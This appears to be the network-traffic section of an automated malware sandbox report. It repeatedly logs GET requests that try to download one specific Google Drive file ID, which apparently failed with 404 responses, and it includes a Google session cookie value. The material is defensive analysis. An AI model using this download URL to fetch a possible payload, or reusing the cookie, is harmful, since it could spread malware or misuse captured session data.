      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache
      Source: global traffic | HTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global traffic
      DNS traffic detected: DNS query: drive.google.com
      Source: global traffic
      DNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTwPpK8b1IEFeWcBtM_0eBX8hjW67ysALGjNpiEgOaf4Sd-FQUXvMMuSLuL1qtMlqblContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:05 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-GV42_E1Q4HqwbFpjWxZNyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: 
NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU; expires=Sat, 12-Jul-2025 14:39:05 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQdeXmSp-9MKnLMvfT1s59gCYGFB0f3Fwqm-wjLqfzQLbnvgzorc74mQ0yQ45f78GkykQPKaaIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:07 GMTContent-Security-Policy: script-src 'nonce-9kCbDWdbZ-iRhnrYLz6QJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com 